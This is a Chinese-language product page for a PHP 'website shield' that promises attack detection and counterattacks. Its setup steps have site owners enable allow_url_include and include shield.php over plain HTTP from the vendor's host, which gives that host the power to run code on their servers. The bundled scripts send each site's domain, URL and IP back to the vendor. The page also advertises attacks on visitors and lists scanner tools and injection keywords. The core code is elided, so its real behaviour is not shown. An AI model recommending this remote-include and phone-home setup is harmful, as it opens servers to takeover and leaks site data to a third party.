产品简介
婳阳网站防护盾是一个强大的PHP防护程序,专门用于防止网站被恶意下载、渗透扫描、数据采集等攻击行为。它采用多维度检测引擎和智能反制系统,能够在后台静默运行,对正常用户零干扰,对攻击者实施精准打击。
智能检测
多维度威胁评分系统,精准识别SQL注入、XSS、LFI等50+种攻击特征
实时反制
8种反制策略,根据威胁等级自动选择:垃圾信息、乱码下载、无限重定向等
JS保护
注入JavaScript代码,防止Ctrl+S保存、右键复制、F12开发者工具
实时监控
shield.php被引用时自动上报,前台实时显示引用数据
高频防护
智能频率检测,防止CC攻击和恶意扫描,自动拦截异常请求
数据统计
完整的访问统计、引用来源分析、攻击记录,后台可视化展示
本系统采用先进的检测算法,能够在毫秒级内完成威胁判断,对正常访问零影响。无论是个人博客、企业网站还是电商平台,都能提供全面的安全保护。
安装方法
将 shield.php 上传到网站目录
文件结构:
/shield.php # 防护文件(被引用的核心文件)
/shield.js # JS保护文件(可选)
/ping.php # 心跳检测文件(可选)
在需要保护的页面顶部添加引入代码
<?php require_once('shield.php'); ?>
shield.php会自动防护,并检测查杀,无需额外配置
将 shield.php 上传到远程服务器(例如:http://hy.168hot.cn/01-shadu/shield.php)
<?php include('http://hy.168hot.cn/01-shadu/shield.php'); ?>
创建 shield.js 文件,内容如下:
// shield.js - 静态页面保护
(function() {
// 发送实时上报
fetch('http://hy.168hot.cn/01-shadu/index.php', {
method: 'POST',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: 'report=shield&file=shield.js&domain=' + encodeURIComponent(window.location.hostname) + '&url=' + encodeURIComponent(window.location.href)
});
// 防保存快捷键
document.addEventListener('keydown', function(e) {
if ((e.ctrlKey || e.metaKey) && e.key === 's') {
e.preventDefault();
}
});
})();
创建 ping.php 文件:
<?php
// ping.php
include('shield.php');
?>
<script src="http://hy.168hot.cn/01-shadu/shield.js"></script>
配置选项
在 shield.php 文件开头的配置数组中调整参数:
$shield_config = [
'log_enabled' => false, // 是否启用日志
'log_file' => __DIR__ . '/shield_log.txt',
'max_requests' => 30, // 最大请求数
'time_window' => 10, // 时间窗口(秒)
'honeypot_enabled' => true, // 启用蜜罐
'fake_api_enabled' => true, // 启用虚假API
'js_injection' => true, // 注入JS保护
'realtime_report' => true, // 启用实时上报
'report_url' => 'http://hy.168hot.cn/01-shadu/index.php' // 上报地址
];
| 配置项 | 说明 | 默认值 |
|---|---|---|
| log_enabled | 是否记录攻击日志 | false |
| max_requests | 时间窗口内最大请求数 | 30 |
| time_window | 检测时间窗口(秒) | 10 |
| honeypot_enabled | 启用蜜罐诱捕系统 | true |
| fake_api_enabled | 启用虚假API响应 | true |
| js_injection | 注入JavaScript保护代码 | true |
| realtime_report | 启用实时上报功能 | true |
| report_url | 实时上报的URL地址 | 当前index.php |
功能详解
1. 智能威胁检测引擎
系统通过多维度评分机制,精准识别各类攻击行为:
| 检测类型 | 检测内容 | 威胁分数 |
|---|---|---|
| 恶意User-Agent | curl, wget, python, sqlmap, nikto, acunetix 等50+种 | +30 |
| 异常HTTP方法 | OPTIONS, TRACE, DELETE, PUT 等非常规方法 | +40 |
| 保存页面尝试 | HTTP_SAVE_DATA, Accept头特征 | +50 |
| SQL注入 | union, select, insert, drop, exec, xp_cmdshell 等 | +60 |
| XSS攻击 | <script>, javascript:, onerror=, alert( 等 | +60 |
| LFI/RFI | ../, etc/passwd, php://filter, boot.ini 等 | +60 |
| RCE攻击 | system(), exec(), shell_exec(), `command` 等 | +60 |
| 高频请求 | 超过30次/10秒 | +40 |
| Tor出口节点 | 通过DNSBL检测Tor网络 | +80 |
| 搜索引擎 | googlebot, bingbot, baiduspider 等(白名单) | -30 |
2. 分级反制策略
根据威胁分数自动选择反制级别:
| 威胁分数 | 反制级别 | 可选策略 |
|---|---|---|
| ≥90 | 致命威胁 | 垃圾HTML、乱码下载、无限重定向、JS循环、XML攻击、综合攻击 |
| 70-89 | 严重威胁 | 垃圾HTML、乱码下载、无限重定向、404伪装、图片垃圾 |
| 50-69 | 中等威胁 | 垃圾HTML、乱码下载、无限重定向、404伪装 |
| 30-49 | 可疑行为 | 简单垃圾信息、伪装页面、延迟响应 |
| <30 | 正常访问 | 不采取任何反制措施 |
3. 蜜罐系统
自动检测对敏感路径的访问,返回虚假的敏感信息,诱捕攻击者:
/wp-admin/admin-ajax.php
/phpmyadmin/index.php
/.git/config
/.env
/backup.zip
/wp-config.php.bak
/sql_dump.sql
/etc/passwd
/boot.ini
/administrator/index.php
/phpinfo.php
/test.php
/shell.php
... 共50+个蜜罐路径
4. 虚假API系统
识别API扫描请求,返回精心构造的虚假数据,浪费攻击者时间:
- 认证错误响应: 返回invalid_api_key、authentication_failed等错误
- 虚假用户数据: 生成大量随机用户信息,包含ID、姓名、邮箱等
- 限流响应: 返回rate_limited、too_many_requests等限流信息
- 认证令牌: 返回虚假的access_token、refresh_token
- 服务器错误堆栈: 返回详细的错误堆栈信息,诱使攻击者深入
- 分析数据: 返回看似真实的网站统计数据、用户行为分析
5. JS保护代码
自动注入的JavaScript保护功能,全方位防止前端操作:
- 防Ctrl+S/Cmd+S保存: 阻止浏览器保存网页
- 防Ctrl+U查看源码: 阻止查看页面源代码
- 防F12开发者工具: 阻止打开开发者工具
- 防右键菜单: 禁止右键点击
- 防选择复制: 禁止文本选择和复制
- 开发者工具检测: 检测开发者工具打开并触发反制
- 动态令牌管理: 防止CSRF攻击
- 心跳检测: 定期发送心跳保持会话
- 防打印: 禁止打印页面
- 防拖拽保存: 禁止拖拽保存图片
6. 实时监控上报
shield.php被引用时自动上报数据,实现实时监控:
- 自动上报: 每次引用自动发送上报请求
- 数据记录: 记录引用域名、IP、时间、User-Agent
- 实时显示: 前台实时更新引用数据
- 历史统计: 完整的引用历史记录
- 来源分析: 分析引用来源域名和文件类型
使用示例
示例1:保护WordPress网站
在主题的 header.php 最顶部添加:
<?php
// 在wp-content/themes/your-theme/header.php最顶部添加
require_once(dirname(__FILE__) . '/shield.php');
?>
示例2:保护所有PHP页面
在网站的入口文件(如index.php)中添加:
<?php
// 自动保护所有页面
define('SHIELD_PATH', '/path/to/shield.php');
require_once(SHIELD_PATH);
// 你的正常代码
?>
示例3:获取引用代码
复制以下代码到你的网站,即可实现防护和实时上报:
<!-- 本地引用 -->
<?php require_once('shield.php'); ?>
<!-- 远程引用 -->
<?php include('http://hy.168hot.cn/01-shadu/shield.php'); ?>
示例4:自定义反制阈值
在引入文件前自定义配置:
<?php
// 在引入文件前自定义配置
$shield_config = [
'max_requests' => 50, // 放宽频率限制
'time_window' => 20, // 延长检测窗口
'js_injection' => false, // 关闭JS保护
'realtime_report' => true, // 保持实时上报
];
include('shield.php');
?>
shield.php 文件详解
shield.php 是核心防护文件,被其他网站引用时自动上报数据。完整代码如下:
<?php
/**
* 婳阳网站防护盾 - 核心防护文件
* 被引用时自动上报数据到index.php
*/
// 配置
$shield_config = [
'log_enabled' => false,
'max_requests' => 30,
'time_window' => 10,
'honeypot_enabled' => true,
'fake_api_enabled' => true,
'js_injection' => true,
'realtime_report' => true,
'report_url' => 'http://hy.168hot.cn/01-shadu/index.php'
// 防护功能代码...
?>
require_once('shield.php') 或 include('shield.php') 引用此文件时,文件会自动触发主动检测项目,发现攻击或者异常会触发主动检测并拦截。不影响被引用网站的正常加载速度。
shield.php 的主要功能
- 实时检测: 被引用时先主动检测危险
- 威胁检测: 检测恶意请求和攻击行为
- 智能反制: 根据威胁等级采取不同反制措施
- JS注入: 向页面注入JavaScript保护代码
- 蜜罐诱捕: 部署虚假敏感路径诱捕攻击者
- 高频防护: 防止CC攻击和恶意扫描
实时监控
实时上报流程
其他网站通过 include('shield.php') 引用防护文件
shield.php 检测到被引用,立即向主程序发送上报请求
主程序记录引用域名、IP、时间等信息到数据库
前台计数器实时更新,后台可查看详细记录
监控指标说明
| 指标 | 说明 |
|---|---|
| 今日实时上报 | 今天 shield.php 被引用的次数 |
| 累计上报 | 历史总引用次数(实时上报总数) |
| 文件检测 | 包括 shield.php、shield.js、ping.php 的总检测次数 |
| 最后上报 | 最近一次引用的时间 |
| 引用来源 | 引用网站的域名和URL |
| 引用IP | 引用网站的服务器IP地址 |
常见问题
A: 需要在php.ini中启用 allow_url_include:
allow_url_include = On
A: 不会。防护程序经过优化,对正常用户几乎没有性能影响。检测逻辑简单高效,只有检测到异常行为才会触发反制。实时上报使用异步cURL,不阻塞页面加载。
A: 启用日志功能后,可以在 shield_log.txt 文件中查看详细的攻击记录,包括IP、时间、攻击类型等。
A: 可以根据实际情况调整检测阈值,或在 shield.php 中修改配置参数。也可以将合法爬虫加入白名单。
A: 使用JS心跳检测方式,参考"安装"部分的"静态页面"方法。shield.js 也会发送实时查杀。
A: 防护程序对移动端完全兼容,JS保护代码会自动适配移动设备,不会影响正常浏览。
婳阳技术支持
如有问题,欢迎联系:
Email: 6115511@qq.com、ylei95@gmail.com
Website: http://hy.168hot.cn
Version: 2.0 (完整无限制版)